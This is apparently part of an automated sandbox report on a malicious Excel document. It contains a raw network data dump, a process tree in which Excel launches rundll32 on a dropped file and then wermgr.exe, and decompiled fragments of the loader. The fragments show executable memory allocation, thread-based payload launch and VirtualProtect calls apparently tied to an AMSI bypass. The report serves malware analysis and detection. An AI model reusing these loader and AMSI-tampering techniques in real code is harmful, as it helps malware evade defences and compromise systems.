                                                                                                                                                      Apr 6, 2021 21:09:09.868897915 CEST1157INData Raw: cc 5a c4 a5 9f 77 30 4f 91 31 fa 79 80 99 89 9c a8 64 e7 03 cc 45 e4 30 3b 8b 71 fc 8a a4 5b c7 f2 39 a5 92 11 2b 26 a7 eb 9c b8 1e b8 e2 2c 0e 29 cc c0 13 3f 85 ba 3a 81 dc 79 58 07 ef 06 00 4f 0e 55 9a e0 31 67 e9 49 21 24 91 81 cb 40 7b 68 10
                                                                                                                                                      Data Ascii: Zw0O1ydE0;q[9+&,)?:yXOU1gI!$@{hcHWh+v[DPB?f*gD<^J,ZL.b9(ylb"sL229wIxE"S-B:nb5%3)K_@J"+Jg3LWN~I'&-K7%
                                                                                                                                                      Apr 6, 2021 21:09:09.868912935 CEST1159INData Raw: b2 34 f2 4e 13 39 96 8c 31 91 ff 4c 21 43 19 e4 2c 13 e9 24 ef 6c cc 20 1f 4e 23 33 d5 cf 31 91 02 79 de 44 de 91 42 ce cb 20 87 36 65 90 e5 04 9b c8 99 29 e4 a4 4c f5 7f 01 12 50 e3 18 9a dc 6c 22 cf 4e 21 13 4b d3 c8 8d 66 ce d3 c8 95 26 f2 c8
                                                                                                                                                      Data Ascii: 4N91L!C,$l N#31yDB 6e)LPl"N!Kf&#r e&P`C2aviw>>fAsm~8,[LZz-,5mq:y-<-.*JE&=e3d<wxd55.XA~^HC!kj"83=QwbvxM
                                                                                                                                                      Apr 6, 2021 21:09:09.868994951 CEST1160INData Raw: d7 72 42 8f 3d b6 8e 13 70 77 53 63 ba 8b 54 ad 5b 07 29 cd d4 5a 68 d6 8a 6c 5b 28 87 88 0d dc 1e 76 3b 48 a5 64 43 6c c2 36 48 d2 d9 fe 24 eb e0 2c e8 20 12 af f5 07 f0 71 82 3f b7 a2 e8 b2 85 ca 18 bc 93 dc b2 87 d2 a8 f7 00 e9 29 e2 8c 66 bc
                                                                                                                                                      Data Ascii: rB=pwScT[)Zhl[(v;HdCl6H$, q?)f]pzwtIyF?<p_8s)gymJ%#f'.;[PT'>b?nBH"+K@gIch%hg=8e- dK!zN6Y)}d3;b9(-EVJK
                                                                                                                                                      Apr 6, 2021 21:09:09.869010925 CEST1160INData Raw: a7 cd d7 4f 8e c0 86 be 5e 28 c0 5e 92 b3 ca 75 23 b1 61 57 cb 0b b0 c3 39 db f4 67 d8 2c cc 4b c6 33 b4 3c 67 8f 97 9e 34 74 e4 73 41 2b 4c 90 5d 26 8e c2 a0 16 13 54 2c 93 8f 4e 14 04 ad 36 41 bc 4c 3a 0a 83 da 4c d0 18 d8 7f 61 d0 1a 13 54 02
                                                                                                                                                      Data Ascii: O^(^u#aW9g,K3<g4tsA+L]&T,N6AL:LaT5A23A\yb$eL/+ueg!3X|4<&dr8ef2y.Y&\&l*VLd`-&s3'7tT"v,C<kO!X %YG:Bq&uTAN 7
                                                                                                                                                      Apr 6, 2021 21:09:09.869025946 CEST1162INData Raw: 31 66 61 30 0d 0a af 84 de 95 29 58 29 93 ba 2f 73 84 7e be 25 a7 da a5 05 aa 15 10 7a b7 29 34 a4 3c 7c 3c 2d 34 78 53 8e b0 54 62 52 41 92 32 06 4a 5a 64 f2 da f1 54 c9 4a c5 42 61 e0 b3 8e c0 b7 c8 f7 76 70 85 08 56 99 6c cc 23 1c fa 7c 34 82
                                                                                                                                                      Data Ascii: 1fa0)X)/s~%z)4<|<-4xSTbRA2JZdTJBavpVl#|4M&?#JdrU\BH&'&*w03IXb+^&L]g*K#pY}e{sVr+l0[5|W/]5ArJG%#'
                                                                                                                                                      Apr 6, 2021 21:09:09.869041920 CEST1163INData Raw: b8 cd 10 2f 49 cc 45 b1 e8 3e 11 72 19 0b a9 64 29 c5 54 0d 31 55 54 74 18 15 96 43 05 b6 2e 0b 53 e7 45 92 5a d7 54 b6 ae 4a 82 de 4b ad ab 02 39 b7 c2 44 52 a8 c5 6c 08 d4 b8 9f 64 af df b9 55 74 b0 8a 52 54 74 84 56 a7 f2 5a 15 24 93 a6 74 de
                                                                                                                                                      Data Ascii: /IE>rd)T1UTtC.SEZTJK9DRldUtRTtVZ$t*A|7/beMwh[(,`krBREO]cGIu9_C*(W2LP)cf: nS`w}7]npd]S7rHTy9|Q$^
                                                                                                                                                      Apr 6, 2021 21:09:09.869057894 CEST1165INData Raw: f5 1a ce e0 42 37 e4 b4 fb e2 9e 51 da 85 25 fc 6a 4f 6e bb fd af e6 98 39 8f 00 d2 07 f3 08 cf 8c 4a 28 92 c9 e5 79 84 95 b9 84 a8 78 92 81 61 6c c5 2e 13 1e c0 41 2c 9e 34 d5 9f 97 1e 87 57 78 99 90 37 47 19 07 e2 db df cc 2d 56 6e 16 f3 c4 24
                                                                                                                                                      Data Ascii: B7Q%jOn9J(yxal.A,4Wx7G-Vn$IR,JLTvff"8!xP3)g4vQZ0"3`> K<X+snR(dh&cqpAl_J}71)|Yo4.OC-l)
                                                                                                                                                      Apr 6, 2021 21:09:10.053993940 CEST1166INData Raw: 14 09 ce 42 90 bc a7 7e f6 ba 0d 9c d0 53 2f 2d 67 2f fb 00 64 c4 dd e9 62 bd 1d 1c 82 9c a4 02 ce 47 eb dc bc 25 5c ec 27 fc 23 56 34 1f 30 10 6b b7 29 50 fa dd bf 30 bd 04 00 06 34 75 20 95 a3 7e 52 8f 98 84 a1 d1 b1 be f1 b1 d6 98 26 26 c2 b5
                                                                                                                                                      Data Ascii: B~S/-g/dbG%\'#V40k)P04u ~R&&Q1_M<!Kg#m[2zblQ@e.@j'$5}l$dM\gE:*+b2,N0M2muU)V[{9]bR kjT39pyml^yM


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:21:09:02
                                                                                                                                                      Start date:06/04/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:21:09:09
                                                                                                                                                      Start date:06/04/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\sdbybsd.fds,StartW
                                                                                                                                                      Imagebase:0x960000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:21:09:10
                                                                                                                                                      Start date:06/04/2021
                                                                                                                                                      Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                      Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                      Imagebase:
                                                                                                                                                      File size:209312 bytes
                                                                                                                                                      MD5 hash:FF214585BF10206E21EA8EBA202FACFD
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >

                                                                                                                                                        Executed Functions

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(042E4054,042E4040), ref: 042E1047
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 042E104E
                                                                                                                                                          • Part of subcall function 042E1B30: SetLastError.KERNEL32(0000000D,?,042E1070,?,00000040), ref: 042E1B3D
                                                                                                                                                        • SetLastError.KERNEL32(000000C1), ref: 042E1096
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225393614.00000000042E1000.00000020.00000001.sdmp, Offset: 042E1000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1866314245-0
                                                                                                                                                        • Opcode ID: 190e823da3ffc2e921b39e049e0ea9fa74b70e4b98d893c7583b5729de18aa30
                                                                                                                                                        • Instruction ID: bd92b00cd0454410e1f9d8abb21c6abb5f798e00a4ee0e1529ae7cd21e89214b
                                                                                                                                                        • Opcode Fuzzy Hash: 190e823da3ffc2e921b39e049e0ea9fa74b70e4b98d893c7583b5729de18aa30
                                                                                                                                                        • Instruction Fuzzy Hash: A5F104B4B10209EFDB04CF95D984ABEB7B1BF48304F6085A8E905AB341D775EE51CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E043C1000() {
                                                                                                                                                        				_Unknown_base(*)()* _v8;
                                                                                                                                                        				void* _v12;
                                                                                                                                                        				struct tagMSG _v40;
                                                                                                                                                        				long _v44;
                                                                                                                                                        				struct HWND__* _v48;
                                                                                                                                                        				long _v52;
                                                                                                                                                        				void* _v56;
                                                                                                                                                        				void* _t38;
                                                                                                                                                        				void* _t43;
                                                                                                                                                        				int _t45;
                                                                                                                                                        
                                                                                                                                                        				SetTimer(0, 0, 0x25b, 0); // executed
                                                                                                                                                        				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
                                                                                                                                                        					_v40.message = _v40.message + 1;
                                                                                                                                                        					if(_v40.message != 0x114) {
                                                                                                                                                        						DispatchMessageW( &_v40);
                                                                                                                                                        						continue;
                                                                                                                                                        					} else {
                                                                                                                                                        					}
                                                                                                                                                        					break;
                                                                                                                                                        				}
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v48 = 0;
                                                                                                                                                        				_v52 = 0x5000;
                                                                                                                                                        				while(_v52 > 0x1000) {
                                                                                                                                                        					_v52 = _v52 - 1;
                                                                                                                                                        				}
                                                                                                                                                        				_v44 = _v52;
                                                                                                                                                        				while(_v44 > 0x40) {
                                                                                                                                                        					_v44 = _v44 - 1;
                                                                                                                                                        				}
                                                                                                                                                        				do {
                                                                                                                                                        					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
                                                                                                                                                        					_v8 = _t38;
                                                                                                                                                        					if(_v8 == 0) {
                                                                                                                                                        						Sleep(0x1f4);
                                                                                                                                                        					}
                                                                                                                                                        				} while (_v8 == 0);
                                                                                                                                                        				_v48 =  &(_v48->i);
                                                                                                                                                        				E043C1140(_v48, _v8);
                                                                                                                                                        				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
                                                                                                                                                        				_v56 = _t43;
                                                                                                                                                        				SetTimer(0, 0, 0x2000, 0); // executed
                                                                                                                                                        				while(1) {
                                                                                                                                                        					_t45 = GetMessageW( &_v40, 0, 0, 0);
                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                        						break;
                                                                                                                                                        					}
                                                                                                                                                        					_v40.message = _v40.message + 1;
                                                                                                                                                        					if(_v40.message == 0x114) {
                                                                                                                                                        						return _t45;
                                                                                                                                                        					}
                                                                                                                                                        					DispatchMessageW( &_v40);
                                                                                                                                                        				}
                                                                                                                                                        				return _t45;
                                                                                                                                                        			}













                                                                                                                                                        0x043c1011
                                                                                                                                                        0x043c1017
                                                                                                                                                        0x043c1031
                                                                                                                                                        0x043c103b
                                                                                                                                                        0x043c1043
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x043c103d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x043c103b
                                                                                                                                                        0x043c104b
                                                                                                                                                        0x043c1052
                                                                                                                                                        0x043c1059
                                                                                                                                                        0x043c1060
                                                                                                                                                        0x043c106f
                                                                                                                                                        0x043c106f
                                                                                                                                                        0x043c1077
                                                                                                                                                        0x043c107a
                                                                                                                                                        0x043c1086
                                                                                                                                                        0x043c1086
                                                                                                                                                        0x043c108b
                                                                                                                                                        0x043c109c
                                                                                                                                                        0x043c10a2
                                                                                                                                                        0x043c10a9
                                                                                                                                                        0x043c10b0
                                                                                                                                                        0x043c10b0
                                                                                                                                                        0x043c10b6
                                                                                                                                                        0x043c10c2
                                                                                                                                                        0x043c10cd
                                                                                                                                                        0x043c10e0
                                                                                                                                                        0x043c10e6
                                                                                                                                                        0x043c10f4
                                                                                                                                                        0x043c10fa
                                                                                                                                                        0x043c1104
                                                                                                                                                        0x043c110c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x043c1114
                                                                                                                                                        0x043c111e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x043c1126
                                                                                                                                                        0x043c1126
                                                                                                                                                        0x043c1131

                                                                                                                                                        APIs
                                                                                                                                                        • SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 043C1011
                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 043C1021
                                                                                                                                                        • DispatchMessageW.USER32 ref: 043C1043
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 043C109C
                                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 043C10B0
                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 043C10E0
                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 043C10F4
                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 043C1104
                                                                                                                                                        • DispatchMessageW.USER32 ref: 043C1126
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225424672.00000000043C1000.00000020.00000001.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.225422158.00000000043C0000.00000004.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000002.00000002.225444151.00000000043F4000.00000002.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 368155642-2766056989
                                                                                                                                                        • Opcode ID: 67f6babc2c3753682db9ebbc7af2862c517ac9f8139ea3300589118a693bbeb8
                                                                                                                                                        • Instruction ID: e42d9b883ec9e618245655b0c3023bffa194739e16f27a41948cf41a148f9741
                                                                                                                                                        • Opcode Fuzzy Hash: 67f6babc2c3753682db9ebbc7af2862c517ac9f8139ea3300589118a693bbeb8
                                                                                                                                                        • Instruction Fuzzy Hash: 7341FB71A44228EBEF10CFA4DD49BEEB778FB58705F105118E601BA2C1D7B9A940EF64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,00000000,00000000), ref: 04860A7A
                                                                                                                                                        • Wow64DisableWow64FsRedirection.KERNEL32(?,?,00000000,00000000), ref: 04860D2B
                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?,?,?,00000000,00000000), ref: 04860D61
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225729556.0000000004860000.00000040.00000001.sdmp, Offset: 04860000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateProcessWow64$DisableInternalRedirection
                                                                                                                                                        • String ID: L!m>$L!m>
                                                                                                                                                        • API String ID: 1412472711-4066150234
                                                                                                                                                        • Opcode ID: 2debcbd2f95738cafc4f7f84f800911599a04c5eff24faa6fbcc3a01dd137e32
                                                                                                                                                        • Instruction ID: 90e9940c03beedbb2b8fbb34d4857a1d881c2bb26b9f1dd3d06c8ba51531ef4d
                                                                                                                                                        • Opcode Fuzzy Hash: 2debcbd2f95738cafc4f7f84f800911599a04c5eff24faa6fbcc3a01dd137e32
                                                                                                                                                        • Instruction Fuzzy Hash: C1F14F74209344DFD764CE18C490A2E77E2AB9A385F544E5AF586CB3A0E772F880DB16
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 042E14DB
                                                                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 042E1507
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225393614.00000000042E1000.00000020.00000001.sdmp, Offset: 042E1000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                        • Opcode ID: 7b9004568a8d67a6709a552505bfd8182c1556eb7cedfbaeb1e70b3653912568
                                                                                                                                                        • Instruction ID: 372811f3bf8eab92927bef502f2e4bba461231d2007fd78db214117a100068e7
                                                                                                                                                        • Opcode Fuzzy Hash: 7b9004568a8d67a6709a552505bfd8182c1556eb7cedfbaeb1e70b3653912568
                                                                                                                                                        • Instruction Fuzzy Hash: 6971D274B20109EFCB08DF99C594ABDB7B2FF48304F6485A8D416AB341D774AE91CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 042E21F9
                                                                                                                                                        • SetLastError.KERNEL32(0000007E), ref: 042E223B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225393614.00000000042E1000.00000020.00000001.sdmp, Offset: 042E1000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorHugeLastRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3239643929-0
                                                                                                                                                        • Opcode ID: 240fd43a0a0dde959844238d6ea28ed750ad2c6ec6b996b626256dd24c7873cf
                                                                                                                                                        • Instruction ID: 889d2481dcc734e0b9b5fcd8b37b083c411d5acc55bd479cd9f737d2620fa2a8
                                                                                                                                                        • Opcode Fuzzy Hash: 240fd43a0a0dde959844238d6ea28ed750ad2c6ec6b996b626256dd24c7873cf
                                                                                                                                                        • Instruction Fuzzy Hash: 0D81C974A10209DFDB04CF85C894AAEBBB5FF48314F548598E90AAB351D774EE81CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,04160005), ref: 041600E9
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,04160005), ref: 04160111
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225361475.0000000004160000.00000040.00000001.sdmp, Offset: 04160000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2032221330-0
                                                                                                                                                        • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                                                                                        • Instruction ID: 2a3585a292ccd4fdc19c34f22209b48ecb0b5b1bf1c19153519863467aa12496
                                                                                                                                                        • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                                                                                        • Instruction Fuzzy Hash: 07D1D171A043069FD724CF69C8C076ABBE0FF88319F18856DE8969B241E774F865CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225393614.00000000042E1000.00000020.00000001.sdmp, Offset: 042E1000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8496fb7dac515ff05279dec7c133e8c8527f0490036a311329e55e88e0aff776
                                                                                                                                                        • Instruction ID: 286c9b0e2158c50d88ee2dd509c1d38d8db4674033f76501ef0f5cfa54f1b670
                                                                                                                                                        • Opcode Fuzzy Hash: 8496fb7dac515ff05279dec7c133e8c8527f0490036a311329e55e88e0aff776
                                                                                                                                                        • Instruction Fuzzy Hash: EA41C374B10209AFDB04CF45C494BBAB7B2FB88314F64C1A9E8199B355D775EA92CB80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,042E1A51,00003000,00000004,000000BE,?,042E1A51,?), ref: 042E1A01
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225393614.00000000042E1000.00000020.00000001.sdmp, Offset: 042E1000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        • Opcode ID: 59b4574b8a590042b14bb4e08bee8ae129205d3c073ae74835ed71c1f1e4a16d
                                                                                                                                                        • Instruction ID: 922b7d1712700a3fec6f74db8f4a562497ae621bd6d459856814e98562e264c4
                                                                                                                                                        • Opcode Fuzzy Hash: 59b4574b8a590042b14bb4e08bee8ae129205d3c073ae74835ed71c1f1e4a16d
                                                                                                                                                        • Instruction Fuzzy Hash: F6D0C9B4645208BBE750CA89D806F69BBACD704611F004185FE089B280D5B1AE0056A1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualFree.KERNELBASE(?,?,?), ref: 042E182F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225393614.00000000042E1000.00000020.00000001.sdmp, Offset: 042E1000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                        • Opcode ID: 2eaa54ddc0ba2afe882079730389e928ae2ffd4c6266a58c5935818e77ad97bb
                                                                                                                                                        • Instruction ID: 4609d2e0de621ace5e09085f74ccafe0e5fb69f1336fdfc3af47be66c20fa7bf
                                                                                                                                                        • Opcode Fuzzy Hash: 2eaa54ddc0ba2afe882079730389e928ae2ffd4c6266a58c5935818e77ad97bb
                                                                                                                                                        • Instruction Fuzzy Hash: 07C04C7621430CAB8B04DF9DE884DAB37ADFB8C611B048548BA1D87201C634F9108BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225361475.0000000004160000.00000040.00000001.sdmp, Offset: 04160000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                        • Instruction ID: f1f6a8e110d8fc03e6c93cf623bc677d1270a10b02699341a9f45e6cc53742ba
                                                                                                                                                        • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                        • Instruction Fuzzy Hash: 67F1E7B4A01209EFDB04CF94C9D4AAEBBB5BF4C304F208598E906AB345D775EE51DB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225361475.0000000004160000.00000040.00000001.sdmp, Offset: 04160000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                                                                                        • Instruction ID: 6f0d4cc35fa8e538c4e574e99ac2eb1aa8bfaf1d794b868b62e5e11781118d66
                                                                                                                                                        • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                                                                                        • Instruction Fuzzy Hash: 04318F36A0474A8FC720DF18C4C096ABBE5FF89314F0609ADE99687313E734F9568B91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExA.KERNEL32(042E4070,00000000,00000800), ref: 042E25F9
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,042E4078), ref: 042E2615
                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 042E2650
                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 042E2671
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225393614.00000000042E1000.00000020.00000001.sdmp, Offset: 042E1000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                        • String ID: AMSI
                                                                                                                                                        • API String ID: 3300690313-3828877684
                                                                                                                                                        • Opcode ID: a2c574a4e9c9a46dc0225ac20c08e09fe2ba185279af79f0a9abd70164e49c1f
                                                                                                                                                        • Instruction ID: 7b685757efdd5c4dc0255bc4f431610b5229019cc31da8a6be34257485775c03
                                                                                                                                                        • Opcode Fuzzy Hash: a2c574a4e9c9a46dc0225ac20c08e09fe2ba185279af79f0a9abd70164e49c1f
                                                                                                                                                        • Instruction Fuzzy Hash: 0C11F9B4F10209EFCB04DF95D849BBEBBB8FB48305F504599E6026B240D7B46A44DF65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 042E2468
                                                                                                                                                        • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 042E24B2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.225393614.00000000042E1000.00000020.00000001.sdmp, Offset: 042E1000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 544645111-2766056989
                                                                                                                                                        • Opcode ID: 441ea29e0c5520c71cd4a161f05d59949fb02d1281c13610778a5cf004a809d9
                                                                                                                                                        • Instruction ID: 44c09fbabfb2f37d6f37323498a61fa569c64741d64eca6ed2ed9ac049595ee2
                                                                                                                                                        • Opcode Fuzzy Hash: 441ea29e0c5520c71cd4a161f05d59949fb02d1281c13610778a5cf004a809d9
                                                                                                                                                        • Instruction Fuzzy Hash: 9B21D8B0B10209EFDB14CF99C984BBEBBB9BF44304F5485D9E906AB240D774AB40DB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%